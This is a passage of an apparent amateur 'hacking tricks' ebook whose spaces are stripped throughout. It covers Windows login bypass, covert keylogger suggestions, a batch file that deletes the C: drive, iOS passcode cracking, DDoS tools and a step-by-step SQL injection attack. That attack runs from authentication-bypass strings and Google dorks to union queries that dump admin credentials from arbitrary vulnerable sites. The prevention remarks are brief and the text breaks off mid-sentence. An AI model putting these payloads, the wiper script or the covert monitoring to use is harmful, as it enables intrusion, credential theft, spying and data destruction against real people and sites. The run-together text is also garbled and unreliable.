Usepassword-protectedscreensavers.Unlockedscreensareagreatwayforsystemstobecompromisedeveniftheirharddrivesareencrypted.
Don’t reusethesamepasswordwithinatleastfourtofivepasswordchanges.Don’tsharepasswords.Toeachhisorherown!
Avoidstoringuser
passwordsinanunsecuredcentrallocation,suchasanunprotectedspreadsheetonaharddrive.Thisisaninvitationfordisaster.UsePasswordSafeorasimilarprogramtostoreuserpasswords.
KONBOOT
BYPASSWINDOWSLOGONSCREENPASSWORD
SometimesitcreatesacriticalconditionifyouforgotyourWindowsadministratorpasswordandit’squiteurgenttorecoveritwithoutany
flaw.Thisarticlewillmakeitconvenienttorecoveryouradminpassword.
WeareusingatoolnamedasKON-BOOT.
Kon-BootisanapplicationwhichwillbypasstheauthenticationprocessofWindowsbasedoperatingsystems.Itenablesyouloginintoanypasswordprotectedtestmachinewithoutany
knowledgeofthepassword.
Kon-Bootworkswithboth64-bitand32-bitMicrosoftWindowsoperatingsystems.
Needythings:–APenDriveorAnyUSBDevicesuchasMemoryCardorablankCD.Kon-Boot(Latestversion)Your5minutesandalsoaworkingmind.
Technicalinstructions:–1.DownloadKON-BOOTfrominternet.2.ExtracttheZIPandrunthe“KonBootInstaller.exe”3.BurntheISO.4.BootfromCD/USBdevice.5.AfterWindowsisloadeditwillshowyouaKon-bootscreen.
6.LeavethepasswordboxemptyandjusthitOKitwill
directlyenableyouintothewindowsaccount.Limitations:ITMAYCAUSEBSOD(NOTEPADPARTICULARBUGS).
KEYLOGGERS
BEAWAREKEYSTROKELOGGING
Oneofthebesttechniquesforcapturingpasswordsisremotekeystrokelogging—theuseofsoftwareorhardwaretorecordkeystrokes
asthey’retypedintothecomputer.
Generallyyouusetoaskyourfriendsorrelativesforlogginginintoyouraccountbytheircomputers.
So,becarefulwithkeyloggersinstalledintheircomputers.Evenwithgoodintentions,monitoringemployeesraisesvariouslegalissuesifit’snot
donecorrectly.Discusswithyourlegalcounselwhatyou’llbedoing,askfortheirguidance,andgetapprovalfromuppermanagement.
Loggingtools:-Withkeystroke-loggingtools,youcanassessthelogfilesofyourapplicationtoseewhatpasswordspeopleareusing:Keystroke-loggingapplicationscanbeinstalledonthemonitoredcomputer.
Isuggestyoutocheckoutfamilykeyloggerby(www.spyarsenel.com).AnotherpopulartoolisInvisibleKeyLoggerStealth;DozensofothersuchtoolsareavailableontheInternet.
OnemoreyoucancheckoutisKGBemployeemonitorisoneofthefavoriteofme…..Becauseitisnotonlyinvisiblebutitwillalsonotshownbyyourtaskmanager
anditusespasswordprotectiontoo.
Hardware-basedtools,suchasKeyGhost(www.keyghost.com),fitbetweenthekeyboardandthecomputerorreplacethekeyboardaltogether.Akeystroke-loggingtoolinstalledonasharedcomputercancapturethepasswordsofeveryuserwhologsin.
PREVENTIONS:
Thebestdefenseagainsttheinstallationofkeystroke-loggingsoftwareonyoursystemsistouseananti-malwareprogramthatmonitorsthelocalhost.It’snotfoolproofbutcanhelp.Asforphysicalkeyloggers,you’llneedtovisuallyinspecteachsystem.
Thepotentialforhackersto
installkeystroke-loggingsoftwareisanotherreasontoensurethatyourusersaren’tdownloadingandinstallingrandomsharewareoropeningattachmentsinunsolicitedemails.ConsiderlockingdownyourdesktopsbysettingtheappropriateuserrightsthroughlocalorgroupsecuritypolicyinWindows.
DOYOUHAVERATED7.9?
LearnHowtoHackWindowsExperienceIndex
StartingfromWindowsVista,MicrosoftintroducedakindofbenchmarkingsysteminitsOperatingSystem.In
WindowsVistaand7userscanratetheirPCusingtheWindowsExperienceIndex.TheHighestpossiblescoreinWindowsVistais5whileWindows7machinescangoupto7.9intheexperienceindex.
IntheWindowsExperienceindexthebasescoreisbasedonthelowestscoreofanycomponent.SuchasinthetestPCitwas4.4based
becauseoftheGraphicssubscore.
Howeveritisnotsotoughtomanipulatethesenumbersandchangethesescoresaccordingtoyourwill.Youcanchangethesejusttofoolanyone.
GETTINGSTARTED
Tomakethingssimplifiedwewouldrecommendyoutorun
WindowsExperienceIndexfirst(Ifyouhavenotdoneso)ifyouhavedonethatyoucanskipthissection.
TodothoseopenControlpanelsgotoSystemandsecurityandthenclickonChecktheWindowsExperienceIndex
AfterthatclickonRateThiscomputerNotethatyourComputermaytakeseveralminutesinrating
thesystem
Youwillseeascreensimilartothis.
MESSINGUPWITHSCORESTomanipulatethesescoresheadtoWindowsinstallationdrive(C:inourcase).Thengoto
Windows>Performance>WinSAT
>DataStoreYouwillabletoseeseveralindexingfilesthere.
Youwillneedtoopenthefileendingwith“Formal.Assessment(Initial).WinSAT”
Openthefileinnotepad.Youwillseethefollowingwindow:
Inthenotepadwindowyoudon’tneedtodotoodownto
huntanything,simplychangethevaluesaccordingtoyourwillintheupperarea.Thevaluesarewrittenbetweentags.Suchas
<MemoryScore>5.9</MemoryScore>
Changethevaluesbetweentagsandsavethefiles.NexttimeyouwillopentheWindows<ExperienceIndexthevalueswillbechanged.
OFFTHEROADTIP:FormorefunwesuggesteveryonetokeeptheirScoresrealistic(Not7.9Exactly)
Torevertthechangesyoucanre-runtheassessment.
THEHIDDENDRIVES
HACKTOHIDELOCALDRIVES
Inthisarticlewearegoingtolearnabouthidingthestuffs.Generally,youguysusetohidetheparticularfilewhichyouwanttokeeppersonal.
Whichisthemostcommonwayinthesedaysanditcaneasilybeexposedevenbyamiddleschoolchild.
But,herewearegoingtolearnthathowtohidethewholespecifieddrives(localdisks)whichkeepyousafefromyourfamilychild.Youcaneasilykeepyourdatasafeeitheritisyourgirlfriend’spicorblah…blah…blah…!
Let’sstarttolearnhowtohidethespecifieddrivesstepbystep:-
Forhidingthedrivesyouhavetoeditthegrouppoliciesofyourcomputer.Foreditinggrouppoliciesjustgoonthe“run”optionandtype“gpedit.msc”andclickonok.OrYoucaneasilysearchinyoursearchboxfortheGROUP
POLICY.
Thegrouppolicyeditorwillbeopenedafteryou!
Thenyouwillseeintheleftpartofthewindowthereisa“USER
CONFIGURATION”option.Undertheuserconfigurationoptiontherearethreeoptions:1.)Softwaresettings2.)Windowssettings
3.)Administrativetemplates
Justgiveasingleclickontheadministrativetemplateoption.Youseethatsomeoptionsaremadeavailableintherightpartofthewindow.Openthe“allsettingsoption.”
Whenyouopenedthe“allsettingsoptions”thereisalistoflotofoptionsdisplayedafteryou!Clickonthe“settings”optiontoarrangethemthenalphabetically.Ifalready
arrangedyoucanskipthisstep.
Nowclickingsometimesthe“H”keyofyourkeyboardsearchforthe“hidethesespecifieddrivesinmy
computer”option.
Doubleclickonthe“hidethesespecifieddrivesinmycomputer”option.Awindowwillopensafteryou.
“ENABLE”itand chooseforthedriveswhichyouwanttohidefromthegivenoptionsinthelowerleftpartofthe
window.Afterapplyingthesettingsjustclickonokandyouseethedriveswillhideaccordingtoyourchoice.IhaveselectedtohideonlyA,B,CandDdrivesonlysotheE:drivewillnotbehiddeninthescreenshotgivenbelow.
Intheabovegivenscreenshotonly“E:”driveisshowntotheuser.Ifyouwanttoaccessthedriveswhicharehiddenthenyouhavetoclickontheaddressbarofmycomputer’s
windowasmarkedintheabovescreenshotandtypeD:”or“C:”andclickonENTERbuttonofyourkeyboardtoopenthedrivesrespectively.
EMPTYHDD
FORMATHARDDISKWITHNOTEPAD
InthisarticlewearegoingtolearnhowtodeletecompletelyyourC:driveofyourcomputerwithoutaformattingcompactdisk.Just
doitonyourownriskbecauseitwilldestroythewindowsofyousystemandforthisIamnotresponsible.
FOLLOWTHEBELOWSTEPSTOFORMATYOUC:DRIVE:_Openthenotepadandtypethefollowinggivecode
CODE:@echooffdelC:\*.*\y
Saveitwiththeextension“.bat”Suchas“virus.bat”.
Doubleclickonthesavedfiletorunthisvirus.Commandpromptwillbeopenedafteryouwhereitwillbedeletingyourdrive.Note:“Ihavenottriedthis
virusyet,andalsopleasedon’ttryonyourpersonalcomputers.Ifyouhavetriedeverpleasegivemethereviews.”
LET’SHAVESOMEFUN
FUNNYVIRUSTOSHOCKYOURFRIENDS
Helloguys,Ithinkafterreadingtheabovechaptersnowit’stimetohavesomefun.Inthisarticleweare
goingtolearnthathowtogiveashocktoyourfriendforaminute.
Basicallyherewearegoingtocreateafunnyviruswhichwillnotactuallyharmyourfriend’scomputerbutitwillshockhim/herforaminute.
Solet’screatethatvirusfollowingthesamestepsaswehavecreatedsomevirusesinpreviouschapters.
Sofollowthesteps:Openthenotepadandtypethefollowingcode:
CODES:@echooffmsg*yourcomputerisattackedbyavirus.msg*clickoktoformat.msg*allyourdatahasbeendeleted.
Savethedocumentwiththeextension“.bat”Forexampleyoucansavethevirusbythename“funnyvirus.bat”
Nowyourworkistoexecutethevirus.Justdoubleclickonthevirusanditwillshowyouamessagethat
“yourcomputerisattackedbyavirus”.
Noweitheryouclickon“ok”oryouclosetheabovemessagebox,itwillagainshowyouamessage“clickoktoformat”.AndIamsurethatyouwillnotgoingtoclickonok.
Butagainitdoesnotmatterifyouclickonokorclosethebox,butIamsurethatyouwillclosethebox.Againitwillshowyouamessagethat“allyourdatahasbeendeleted”.Andforamomentyourfriend’sheartbeataregoingtobeontheoptimum.
Sothisisafunnywaytoshockyourfriendswithoutharmingthemactually.
DOYOUHAVEi7
?HOWTOCHANGEYOURPROCESSORNAME
ThetrickwearegoingtolearnhereisthemostinterestingtrickandIamsurethatitwillincreaseyourprestigeamongyourfriends.Becausenowthesedaysit’sabigdealamongthegroupofyourfriendthatifyouhavei3,i5ori7processor.Solet’slearnhowtochangeyourpcfromanyofcoreprocessortoi7.
Forityouhavetofollow
thesesteps:
Firstofallyouhavetogoonthe“run”optionandwrite“regedit”toopentheregistryeditorofyourcomputerandclickonokItwillopentheregistryeditingwindowafteryou.
Openthe“HKEY_LOCAL_MACHINE”ashighlightedinthefigure.
Thenopenthe“hardware”optionpresentunderit.
Thenopenthe“Description”optionandthenopenthe“system”option.Alsoopenthe“centralprocessor”optionundersystemoption.
Thengiveasingleclickto“0”folderpresentunder“centralprocessor”.Andthenyouwillseethatintherightpartoftheregeditwindowthereappearalotofoptions.Thisiscalledas
STRINGS.Searchforthe“processornamestring”amongthosestrings.
Opentheprocessornamestringgivingadoubleclickonit.Adialogueboxwillopenafteryou.Inthe“valuedata”textbox
itiswrittenwhatyourcomputer’sprocessoractuallyis.
Iamusing“Pentium(R)[email protected]”aswritteninthevaluedata.Nowdeletethosetextsandwriteyourowntextreplacing
them.Suchasyoucanwrite”Intel(R)[email protected]”andclickon“ok”option.
Nowclosetheregistryeditorandlet’scheckifitisworkingornot.Forcheckingit,you
havetocheckthepropertiesofyourcomputer.Forcheckingit,justgivearightclickonmycomputericonandclickonthe“properties”optionwhichisthelastoptionofthedialoguebox.
Thesystempropertiesofyourcomputerareshownafteryou.
Yuppie!Asyouhaveseenintheprocessornameitwillbeasexpected.Nowyourprocessoristurnedintoi7.
Andnow youcansaywith
proudthatYOUHAVEACOREi7PROCESSOR.
HOWTOMAKEYOURGOOGLESEARCHSEFFECTIVE
InthisarticlewearegoingtolearnhowtomakeourGooglesearcheseffective.Ifwehavetofindanythingon
GoogleweusetoopentheGooglewebsiteandstartsearchinglikeifyouwanttodownloadanybookonGoogleyouusetowritelikethis“fiftyshadesofgreyforfree”.AndyouwillfindahugeamountofresultsonGooglelike753286543567resultsin0.43secondsandwillmakeyoudifficulttofindtheexactworkingdownloadlinkofthatbook.
YoucantakesomeverysimplestepstoreduceyourGooglesearchesresults.Let’sassumewehavetodownloadthesamebookasabovementioned.IfyouusetowriteinthefollowingwayitwillreduceyourGooglesearchesandmakeitsimpletofindtheexactdownloadlink.WriteinthiswayintheGooglesearches:Youhavetowriteyour
searchesunderdoublequotes.Like:-“fiftyshadesofgrey.pdf”Note:-don’tforgettoapplytheextension“.pdf”
Secondmethod:-using“GOOGLEHACKS”Youcanalsouseanapplicationnameas“Googlehacks”.ItiseasilyavailableonthenetandyoucandownloaditeasilybyGooglesearches.
Thisapplicationalsohelpsyoualotinperforming
effectivesearches.
iOSPASSWORDCRACKING
IOSPASSWORDCRACKING
Nowthesedays’peoplegenerallyuse4-digitpintosecuretheirphone.Amobile
devicegetslostorstolenandallthepersonrecoveringithastodoistrysomebasicnumbercombinationssuchas1234,1212,or0000.andsoonthewillbeunlocked.
Let’sseehowtocrackyouriospassword:1.ForthefirststepyouhavetoplugyouiPhoneorcomputerintodevicefirmwareupgrademodei.e.DFUmode:
ToenterDFUmode,simplypowerthedeviceoff,holddowntheHomebutton(bottomcenter)andsleepbutton(uppercorner)atthesametimefor10seconds,andcontinueholdingdowntheHomebuttonforanother10seconds.Themobiledevicescreengoesblank.
2.afterputtingyourphoneintoDFUmodeyouneedtoLoadtheiOSForensic
ToolkitforthisyouneedtoinsertyourUSBlicensedongleintoyourcomputerandrunningTookit.cmd:
3.AfterthattheworkistodoistoloadtheiOSForensic
ToolkitRamdiskontothemobiledevicebyselectingoption2LOADRAMDISK:WhenyouloadedtheRAMDISKcodeitallowsyourcomputertocommunicatewiththemobiledeviceandrunthetoolswhichareneededforcrackingthepassword(amongotherthings).
4.NowyouneedtoselecttheiOSdevicetype/modelthatis
connectedtoyourcomputer,asshowninFigure:
Idon’thaveiphone6withmenowso;Ihaveselectedoption14becauseIhaveaniPhone4withGSM.
Afterthatyouseethetoolkitwhichisconnectingtothedeviceanditconfirmsasuccessfulload,asshowninFigure:
AlsoyouwillseetheElcomsoftlogointhemiddleofyourmobiledevice’sscreen……Ithinkitlookspretty:
6.Nowifyouwanttocrackthedevice’spassword/PIN,youhavetosimplyselecttheoption6GETPASSCODE
onthemainmenu:
iOSForensicToolkitwillpromptyoutosavethepasscodetoafile.Forsavingthepasscodesimply;youcanpressEntertoacceptthedefaultofpasscode.txt.Thecrackingprocesswillcommenceand,withanyluck,thepasscodewillbefoundanddisplayedafteryouasshowninFigure:
So,havingnopasswordforphonesandtabletsisbad,anda4-digitPINsuchasthisisalsonotmuchbetterchoice.
Sobeawareabouttheattacks!Getup-users-getupit’stimetobesecured.YoucanalsouseiOSForensicToolkittocopyfilesandevencrackthekeychainstouncoverthepasswordthatprotectsthedevice’sbackupsiniTunes(option5GETKEYS).
PREVENTION:Forthepreventionfrombeinghackedyoucanrefertothe
chapter“PASSWORDCREATINGPOLICIES”.
HIDEYOURRECYCLEBIN
HACKTOHIDETHERECYCLEBIN
SometimeswhenyoujusttrytomodifythewindowsGUIorevenyouusetoinstallanythemeforyourwindowssometimesyoufindthatthe
recyclebiniconremainsnotmodifiedanddestroysthebeautyofyourmodification.
SointhisarticlewearegoingtolearnthathowtodeletetheRECYCLEBINbyhackingregistry.
Fordeletingtherecyclebinyouneedtoopentheregistryeditorofyourcomputer.Ithinknowafterreadingtheabovesectionsyouare
familiarwiththe“registryeditor”.Sogothroughtheregistryeditorandfollowthegivenpath.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVe00AA002F954E}
Whenyoufinallyopenedthelastpath,youwillseethedefaultstringofrecyclebinis
defined.NowDELETEthatstringandrestartyourcomputer.Youwillfindthatrecyclebinisdeleted.Iamattachingascreenshotforyourease.
Byfinalizingallstepsdon’tforgettorestartyourcomputer.Itwillworkonlyontherestart.
HOWBOTNETDDoSATTACKWORKS…
DDoSAttack?
DDoSstandsfor“DistributedDenialofService.”ADDoSattackisalsoamaliciousconceivetoproduceaserveroranetworkresourceinaccessibletousers,normallybyquicklyofficiouswithorsuspendingtheadministrationsofahostrelatedtothenet.IncontrasttoaDenialofService(DoS)attack,insidethatone
computerandoneinternetassociationisusedtofloodtargetedresourcewithpackets,aDDoSattackusesmanycomputersandlotsofinternetconnections.DDoSattacksislooselydividedintothreedifferenttypes.Thefirst,ApplicationLayerDDoSAttacksembraceSlowloris,Zero-dayDDoSattacks,DDoSattacksthatconsiderApache,WindowsorOpenBSDvulnerabilities
andextra.ComprisedofSeeminglylegitimateandinnocentrequests,thegoaloftheseattacksistocrashthenetserver,andadditionallythemagnitudeismeasuredinRequestspersecond.ThesecondkindofDDoSattack,ProtocolDDoSAttacks,alongwithSYNfloods,fragmentedpacketattacks,PingofDeath,SmurfDDoSandextra.Thissortofattackconsumesactualserver
resources,orthoseofintermediatefacility,likefirewallsandloadbalancers,andismeasuredinPacketspersecond.ThethirdkindofDDoSattackisusuallythought-abouttomostdangerous.Volume-basedDDoSAttacksembraceUDPfloods,ICMPfloods,anddifferentspoofedpacketfloods.Thevolume-basedattack’sgoalistosaturatetheinformationmeasureofthe
attackedwebsite,andmagnitudeismeasuredinBitspersecond.
Botnet?
Sometimesobservedasa“BunchofZombies,”a
BotnetmaybeaclusterofInternet-connectedcomputers,everyofthathasbeenmaliciouslycondemned,sometimeswiththehelpofmalwarelikeTrojanHorses.Usuallywhilenotthedataofthecomputers’rightfulhomeowners,thesemachinessquaremeasureremotelycontrolledbyanexternalsourceviacommonplacenetworkprotocols,andoftenusedformaliciousfunctions,
mostordinarilyforDDoSattacks.
BotnetTools
TheconceiverofaBotnetisoftenbroughtupasa“botherder”or“botmaster.”ThisindividualcontrolstheBotnetremotely,usuallythroughassociateIRCserverorachannelonapublicIRCserver–referredtoasthecommandandcontrol(C&C)
server.TocommunicatewiththeC&Cserver,thebotmasterusesnumeroushiddenchannels,aswellasapparentlyinnocuoustoolslikeTwitterorIM.Alotofadvancedbotsautomaticallyhuntdownalotofresourcestoexploit,joiningalotofsystemstotheBotnetduringaprocessreferredtoas“scrumping.”Botnetserversmightcontinuallycommunicateandworkwith
differentBotnetservers,makingentirecommunitiesofBotnet’s,withindividualormultiplebotmasters.ThisimpliesthatanygivenBotnetDDoSattackmayverywellhavemultipleorigins,orbecontrolledbymultiplepeople,generallyoperatingincoordination,generallyoperatingsingly.Botnetsareaunitobtainableforrentorleasefromnumeroussources,anduseofBotnet’s
areauctionedandlistedamongattackers.Actualmarketplaceshavesprungup–platformsthatmodifycommercialisminlargenumbersofmalware-infectedPCs,whichmightberentedandemployedinBotnetDDoSordifferentattacks.TheseplatformsofferBotnetDDoSattackperpetratorswithanentireandrichly-featuredtoolkit,andadistributionnetwork
additionally.Evenfornon-technicalusers,BotnetDDoSattackingmaybeaviableandefficientchoiceto“takeout”acompetitor’swebsite.Atintervalsthecrimesystem,BotnetDDoSattacksareaunitathoughtartifact,withcoststakingplace,andeffectivenessandclassgrowing.AnumberoftheforemostcommontoolsforinitiatingaBotnetDDoSattackaresimplydownloaded
frommultipleon-linesources,andinclude:
SlowLoris
EspeciallydangeroustohostsrunningApache,dhttpd,tomcatandGoAheadWebServer,Slowlorismaybeahighlytargetedattack,enablingoneinternetservertorequiredownanotherserver,whilenottouchingdifferentservicesorportson
thetargetnetwork.
Tor’sHammer
IsaslowpostdostestingtoolwritteninPython.ItalsocanberunthroughtheTornetworktobeanonymized.ThereareseveraltoolsfortestingserverreadinesstoresistBotnetDDoSattacks.
QslowlorisUsesQtlibrariestoexecute
thewaysutilizedbySlowloris,providingagraphicalinterfacethatcreatestheprogramhighlysimpletouse.ApacheKiller
UtilizesanexploitwithintheApacheOSinitialdiscoveredbyaGooglesecurityengineer.ApacheKillerpingsaserver,tellstheservertointerruptupwhateverfileistransferredintoahugerange
oflittlechunks,usingthe“range”variable.Whentheservertriestoadjusttothisrequest,itrunsoutofmemory,orencountersalternativeerrors,andcrashes.
PyLorisItisascriptabletoolfortestingaservice’slevelofvulnerabilitytoaspecificcategoryofDenialofService(DoS)attack
DDoSim
WhichcanbeemployedinalaboratoryatmospheretosimulateaDDoSattack,andhelpslivethecapabilityofagivenservertohandleapplication-specificDDOSattacks,bysimulatingmultiplezombiehostswithrandomIPaddressesthatcreatetransmissioncontrolprotocolconnections.
BotnetDDoSAttacks
BotnetDDoSattacksarequicklyturningintotheforemostprevailingvarietyofDDoSthreat,growingspeedilywithinthepastyearineachnumberandvolume,consistentwithrecentmarketingresearch.Thetrendistowardsshorterattackperiod,howeverlargerpacket-persecondattackvolume,andthereforethe
overallvarietyofattacksaccordinghasgrownupmarkedly,aswell.Thetypicalattackinformationmeasureascertainedthroughoutthiseraof2010-2012wasfive.2Gbps,whichis148%abovethepreviousquarter.AnothersurveyofDDoSattacksfoundthatquite400thofrespondent’soldattacksthatexceeded1Gbitspersecondinbandwidthin2011,and13weretargeted
byaminimumofoneattackthatexceeded10Grate.Fromamotivationalperspective,neweranalysisfoundthatideologicallydrivenDDoSattacksareontheincrease,supplantingmonetarymotivationbecausethemostfrequentincentivesuchattacks.
WEBSITEHACKING
WEBSITEHACKING
Nowtakeyourtimeandbeseriousandfreebeforestartingthisarticlebecausethisistheverywideandoneofthemostinteresting
articlesamongalloftheabovechapters.WewilldiscussinthischapterthathowtohackanyvulnerablesiteusingSQLinjection.
WhatisSQLInjection?
SQLinjectionisoneofthepopularwebapplicationshackingmethod.UsingtheSQLInjectionattack,anunauthorizedpersoncanaccessthedatabaseofthe
website.AttackercanextractthedatafromtheDatabase.
WhatahackercandowithSQLInjectionattack?
*ByPassingLogins*Accessingsecretdata*Modifyingcontentsofwebsite*ShuttingdowntheMySQLserver
So,herewestartwith
bypassinglogin…….i.e.Authenticationbypass:
InthistypeofSQLinjectiongenerallyifwehadfoundtheAdminloginpageandafterthatwewilltrytoopenthecontrolpanelaccountoftheadminbypassingtheauthentication.Ifyouhavetheadminloginpageofanywebsitethenyoucanpastethefollowingcodes(withquotes)tobypassthe
authenticationofthewebsite….generallyPHPwebsitesarevulnerabletothisinjection:
YoucanfindthesetypesofsitessimplybyGooglesearches.YouhavetotypelikethisintheGooglesearchbar:
www.thesitename.com/adminlogin.php?Or/admin.php?OrWp-login.php?Etc.
AfterfindingtheloginpageyouhavetopastethefollowingcodesinbothuserIDandpasswordoftheadminpagetillitwillbypassed.IfnotwewilltrythenextSQLinjectioni.e.unionbased,blindbased,errorbasedetc.
CodestobeusedasbothuserIDandpasswordattheadminloginpageofvulnerablewebsitefor
bypassingauthenticationareasfollow:
‘or’1'=’1‘or‘x’='x‘or0=0–”or0=0–or0=0–‘or0=0#”or0=0#or0=0#‘or‘x’='x”or“x”=”x‘)or(‘x’='x‘or1=1–”or1=1–or1=1–‘ora=a–”or“a”=”a‘)or(‘a’='a“)or(“a”=”ahi”or“a”=”ahi”or1=1–hi’or1=1–‘or’1=1'
Iftheauthenticationbypasswillnotworkthentrythefollowingtechniquescarefullyandstepbystep:UNIONBASEDSQLi:FindingVulnerableWebsite:
TofindaSQLInjectionvulnerablesite,youcanuseGooglesearchbysearchingforcertainkeywords.Thatkeywordoftencalledas“GOOGLEDORK”.
SomeExamples:inurl:index.php?id=inurl:gallery.php?id=inurl:article.php?id=inurl:pageid=
NowyouhavetoCopyoneoftheabovekeywordandGoogleit.Here,wewillgetalotofsearchresultswithwhichwehavetovisitthewebsitesonebyoneforfindingthevulnerability.
Forexample:site:www.anyselectedsite.cominurl:index.php?id=Step1:FindingingtheVulnerability:
Nowletusthevulnerabilityofthetargetwebsite.Tothevulnerability,addthesinglequotes(')attheendoftheURLandpressenter.
Foreg:http://www.anyselectedsite.com/index.php?
id=2'Ifthepageremainsinsamepageorshowingthatpagenotfound,thenitisnotvulnerable.Ifyougotanerrormessagejustlikethis,thenitmeansthatthesiteisvulnerable.
YouhaveanerrorinyourSQLsyntax;themanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear'\''atline1
Step2:FindingNumberofcolumnsinthedatabase:Great,wehavefoundthatthewebsiteisvulnerabletoSQLiattack.OurnextstepistofindthenumberofcolumnspresentinthetargetDatabase.Forthatreplacethesinglequotes(')with"orderbyn"statement.Changethenfrom1,2,3,4,,5,6,...n.Untilyougettheerrorlike"unknown
column".
Foreg:http://www.anyselectedsite.com/index.php?id=2orderby1http://www.anyselectedsite.com/index.php?id=2orderby2http://www.anyselectedsite.com/index.php?id=2orderby3http://www.anyselectedsite.com/index.php?id=2orderby4Ifyougettheerrorwhiletryingthe"n"thnumber,thennumberof
columnis"n-1".Imean:http://www.anyselectedsite.com/index.php?id=2orderby1(noerrorshownshown)http://www.anyselectedsite.com/index.php?id=2orderby2(no
errorshown)http://www.anyselectedsite.com/index.php?id=2orderby3(noerrorshown)http://www.anyselectedsite.com/index.php?id=2orderby4(no
errorshown)http://www.anyselectedsite.com/index.php?id=2orderby5(noerrorshown)http://www.anyselectedsite.com/index.php?id=2orderby6(noerrorshown)http://www.anyselectedsite.com/index.php?id=2orderby7(noerrorshown)http://www.anyselectedsite.com/index.php?id=2orderby8(errorshown)
Sonown=8,thenumberofcolumnisn-1i.e.,7.
Incase,iftheabovemethodfailstoworkforyou,thentrytoaddthe"--"attheendofthestatement.Foreg:
http://www.anyselectedsite.com/index.php?id=2orderby1-Step3:FindtheVulnerablecolumns:
Wehavesuccessfullyfound
thenumberofcolumnspresentinthetargetdatabase.Letusfindthevulnerablecolumnbytryingthequery"unionselectcolumnssequence".
Changetheidvaluetonegative(imeanid=-2).Replacethecolumns_sequencewiththenofrom1ton-1(numberofcolumns)separatedwithcommas(,).
Foreg:
Ifthenumberofcolumnsis7,thenthequeryisasfollow:http://www.anyselectedsite.com/index.php?id=-2unionselect1,2,3,4,5,6,7—
Ifyouhaveappliedtheabovemethodandisnotworkingthentrythis:http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,3,4,5,6,7-
Onceyouexecutethequery,itwilldisplaythevulnerablecolumn.
Bingo,column'3'and'7'arefoundtobevulnerable.Letustakethefirstvulnerablecolumn'3'.Wecaninjectourqueryinthiscolumn.Step4:Findingversion,database,user
Replacethe3fromthequerywith"version()"Foreg:http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,version(),4,5,6,7—Now,Itwilldisplaytheversionas5.0.2or4.3.Somethinglikesthis.Replacetheversion()withdatabase()anduser()forfindingthedatabase,userrespectively.Foreg:
http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,database(),4,5,6,7-http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,user(),4,5,6,7-Iftheaboveisnotworking,thentrythis:http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,unhex(hex(@@version)),4,5,6,7-
Step5:FindingtheTableName
IftheDatabaseversionis5orabove.Iftheversionis4.x,thenyouhavetoguessthetablenames(blindsqlinjectionattack).Letusfindthetablenameofthedatabase.Replacethe3with"group_concat(table_name)andaddthe"frominformation_schema.tableswheretable_schema=database()"
Foreg:
http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,group_concat(table_name),4,5,6,7frominformation_schema.tableswheretable_schema=database()-
Nowitwilldisplaythelistoftablenames.Findthetablenamewhichisrelatedwiththeadminoruser.
Letuschoosethe"admin"table.Step6:FindingtheColumnNameNowreplacethe"group_concat(table_name)withthe"group_concat(column_name)"
Replacethe"frominformation_schema.tables
wheretable_schema=database()--"with"FROMinformation_schema.columnsWHEREtable_name=mysqlchar—
WehavetoconvertthetablenametoMySqlCHAR()string.InstalltheHackBaraddonfrom:https://addons.mozilla.org/en-US/firefox/addon/3899/
Onceyouinstalledtheadd-on,youcanseeatoolbarthatwilllooklikethefollowingone.IfyouarenotabletoseetheHackbar,thenpressF9.
Selectsql->Mysql->MysqlChar()intheHackbar.
Itwillaskyoutoenterstring
thatyouwanttoconverttoMySQLCHAR().WewanttoconvertthetablenametoMySQLChar.Inourcasethetablenameis'admin'.
NowyoucanseetheCHAR(numbersseparatedwithcommans)intheHacktoolbar.
Copyandpastethecodeattheendoftheurlinsteadofthe"mysqlchar"
Foreg:http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,group_concat(column_name),4,5,6,7frominformation_schema.columnswheretable_name=CHAR(97,100,
109,105,110)—Theabovequerywilldisplaythelistofcolumn.Forexample:
admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_usernme,username,password..etc..
Nowreplacethereplacegroup_concat(column_name)withgroup_concat(columnname1,0x3a,anothercolumnname2).
Nowreplacethe"fromtable_name=CHAR(97,100,table_name"information_schema.columnswhere
109,105,110)"withthe"fromForeg:http://www.anyselectedsite.com/index.php?id=-2and1=2unionselect1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7fromadmin-
Iftheabovequerydisplaysthe'columnisnotfound'error,thentryanothercolumnnamefromthelist.
Ifwearelucky,thenitwilldisplaythedatastoredinthedatabasedependingonyourcolumnname.Forexample,usernameandpasswordcolumnwilldisplaythelogincredentialsstoredinthedatabase.
Step7:FindingtheAdminPanel:
Justtrywithurllike:http://www.anyselectedsite.com/admin.phphttp://www.anyselectedsite.com/admin/http://www.anyselectedsite.com/admin.htmlhttp://www.anyselectedsite.com:2082/etc.
Ifyouarelucky,youwillfindtheadminpageusingaboveurlsoryoucanusesomekindofadminfindertoolslike
Havijadminfinder,sqlpoisonforSQLattacking(tool).
Andonceyoufoundtheadminpanelyouhavetodofurtherworksonyourownrisk.PREVENTION:
Thisarticleisfocusedonprovidingclear,simple,actionableguidanceforpreventingSQLInjection
flawsinyourapplications.SQLInjectionattacksareunfortunatelyverycommon,andthisisduetotwofactors:
1.)ThesignificantprevalenceofSQLInjectionvulnerabilities,and2.)Theattractivenessofthetarget(i.e.,thedatabasetypicallycontainsalltheinteresting/criticaldataforyourapplication).
It’ssomewhatshamefulthattherearesomanysuccessfulSQLInjectionattacksoccurring,becauseitisEXTREMELYsimpletoavoidSQLInjectionvulnerabilitiesinyourcode.
SQLInjectionflawsareintroducedwhensoftwaredeveloperscreatedynamicdatabasequeriesthatincludeusersuppliedinput.ToavoidSQLinjectionflawsis
simple.Developersneedtoeither:a)stopwritingdynamicqueries;and/orb)preventusersuppliedinputwhichcontainsmaliciousSQLfromaffectingthelogicoftheexecutedquery.
ThisarticleprovidesasetofsimpletechniquesforpreventingSQLInjectionvulnerabilitiesbyavoidingthesethreeproblems.Thesetechniquescanbeusedwith
